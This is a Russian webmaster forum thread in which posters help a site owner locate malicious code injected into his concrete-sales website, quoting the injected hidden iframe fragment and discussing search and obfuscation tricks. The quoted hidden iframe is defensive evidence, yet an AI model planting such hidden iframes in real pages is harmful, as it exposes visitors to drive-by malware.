Конкурс на срочный поиск вредоносного кода на сайте - 5000 р.

123
[Удален]
#11

Автор, смотри где в коде стоит:

<li><a href="/">Главная</a> </li><li><a href="/price/">Цены</a> </li><li><a href="/references">Отзывы </a> </li><li><a href="/quality/">Качество</a> </li><li><a href="/dostavka/">Карта заводов</a> </li><li><a href="/zakaz/">Заказать бетон</a> </li><li><a href="/faq">Вопросы и ответы</a> </li><li><a href="/analytics/">Аналитика</a> </li><li><a href="/cooperation/">Партнерам</a> </li><li><a href="/contacts/">Контакты</a> </li><li><a href="/blog/">Блог</a> </li>  </ul>

</div>

<div class="navigation2"><iframe src=";vid=5&search=cleaner&php=2" style="display:none"></iframe>
<table>
<tr>
<td valign="top">
<b><a href="/special/"><u>Спецпредложения</u></a></b>

т.е. между блоком "navigation" и "спецпредложением"

Если используется CMS - ищите в модуле с классом "navigation2"

S2
На сайте с 07.01.2008
Offline
611
#12

1. Только эти 2 страницы заражены? Вы их нашли в ВМ? По тому, что тут написано всё проверили: http://help.yandex.ru/webmaster/?id=1059440#1059447

2. Вы пробовали сравнивать код - безопасной страницы

Посмотреть сохранённую безопасную копию
Это не угрожает вашему компьютеру и данным

с кодом страницы что в выдаче? Если ничего не найдено, то значит есть с неё ссылка на заражённую страницу. Это как в на сайтах с баннерной рекламой - если там попадался баннер ведущий на заражённый сайт, то сайт где баннер крутился попадал под санкции. если есть, то это и есть искомое.

Не надо приписывать мне свои выводы, я имею ввиду только то, что написал. Лучшая партнёрка по футболкам/толстовкам (http://partnerka.kolorado.ru/?ref=1921540) Опрос: Проверить текст на уник - как? (/ru/forum/495885)
[Удален]
#13
admak:
изменить дату/время файла - всего лишь одна команда.

1. Искать подгружаемые файлы (include, require и т.д.)

ну это понятно. возможен еще вариант, когда все свои скрипты действительно абсолютно чистые, а вот хостинг - не совсем. это редкий случай, но встречался и с таким тоже

Да, возможно.

admak:

2. Искать в коде по "http"

лучше искать co.cc или iframe или куски доменов, что приведены выше.
хотя... простейший самописный кодировщик скроет все это, не говоря про тривиальный base64, uuencode и прочее..

Может код выдает динамический адрес? там и .com может быть, и .ru.. а вот без http проинклудить не получится.

Кодировщик да, скроет.

admak:

3. Искать все java-скрипты

ява-скрипты тут не при чем, т.к. в данном случае контент отдается пхп скриптом.

Ява скрипт тут причем тогда, когда надо найти зашифрованный или закодированный код. Без JS это сделать затруднительно.

Хотел бы добавить автору:

Долбите разработчиков Октопуса, вполне вероятно что через их дыру попал к вам сплойт.

NumLocked
На сайте с 16.05.2010
Offline
50
#14

ставьте сохраненные ранее бекапы, анализируйте изменения. если у вас их нет, то проект ваш не серьезный и не стоит 5т. в целом)

при входе на сайт у меня нод высветил атаку трояна wiki\js.php - проблема в нем! фреймы вообще яндексом всегда считались признаком вредноносного ПО. и не только яндексом..

от 5т. не откажусь :)

A
На сайте с 19.07.2010
Offline
130
#15
loot:

Может код выдает динамический адрес? там и .com может быть, и .ru.. а вот без http проинклудить не получится.

панацеи нет ни на что... :( echo "ht"+"tp"; или echo "h"+"t"+"t"+"p";

Ява скрипт тут причем тогда, когда надо найти зашифрованный или закодированный код. Без JS это сделать затруднительно.

мы рассматриваем конкретный случай, а не переливаем воду.

ява-скрипт выполняется на стороне клиента(т.е. браузера) и он не имеет ни какого отношения к вредоносному коду,

который я показал в первом своем посте.

этот html код отдает именно сервер(пхп,перл,цги и т.д.), а не клиентский ява скрипт.

admak добавил 16.10.2010 в 16:20

NumLocked:
при входе на сайт у меня нод высветил атаку трояна wiki\js.php - проблема в нем! фреймы вообще яндексом всегда считались признаком вредноносного ПО. и не только яндексом..

wiki\js.php - это уже следствие включенного ранее ифрейма.

когда-то наблюдал картину, что через первый ифрейм цеплялось еще последовательно штук 7 других вирусяк. наверное, они надеялись, что если первый вирус не сработает, то сработает второй, третий и т.д.

.............
asto
На сайте с 13.10.2005
Offline
180
#16

Касперский блокирует работу скрипта, расположенного по адресу Надо все подключаемые файлы проверять.

[Удален]
#17
admak:

мы рассматриваем конкретный случай, а не переливаем воду.
ява-скрипт выполняется на стороне клиента(т.е. браузера) и он не имеет ни какого отношения к вредоносному коду.
этот html код отдает именно сервер(пхп,перл,цги и т.д.), а не клиентский ява скрипт.

Как одно мешает другому? Средствами JS можно подгрузить сторонний php код в процессе выполнения на стороне клиента.

Это один из вариантов, указанный мной одним из последних (если поиск по инклудам в php файлах ничего не дал)

admak:

когда-то наблюдал картину, что через первый ифрейм цеплялось еще последовательно штук 7 других вирусяк. наверное, они надеялись, что если первый вирус не сработает, то сработает второй, третий и т.д.

Это называется связка сплойтов.

В любом случае для ее вызова нужно поместить код в исполняемые файлы на сервере.

ps. Я вижу автор уже почистил скрипты.

[Удален]
#18

Кому приз-то достался? :) Или все альтруисты :)

Deman_nsk
На сайте с 05.04.2008
Offline
130
#19
Double Question:
Кому приз-то достался? :) Или все альтруисты :)

Я думаю - приз - не самое главное здесь.

Проблема актуальна и опыт полученный в этой теме не сравним с представленным килобайтом деревянных.

barca1
На сайте с 20.08.2005
Offline
113
#20
admak:
а это что за бип-ня?...
на странице http://m350.ru/price/


<div class="navigation2"><iframe src=";onpage=cleaner&e=http" style="display:none"></iframe>


чистить немедленно. такого признака может быть достаточно для занесения в блек.

Upd: похоже вас довольно умно затроянили, при рефреше код пропадает.
если нужно, помогу найти и вычистить этот код с сайта.

На текущий момент admak - главный претендент на победу.

Пока по решению этого вопроса я общаюсь с ним.

Почему-то не вижу кнопки "отредактировать" сообщение - раньше была.

Может быть есть deadline, после которого сообщения не правятся? Или я чего не понимаю...

С уважением, Павел Носиков, руководитель системы «М350»
123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий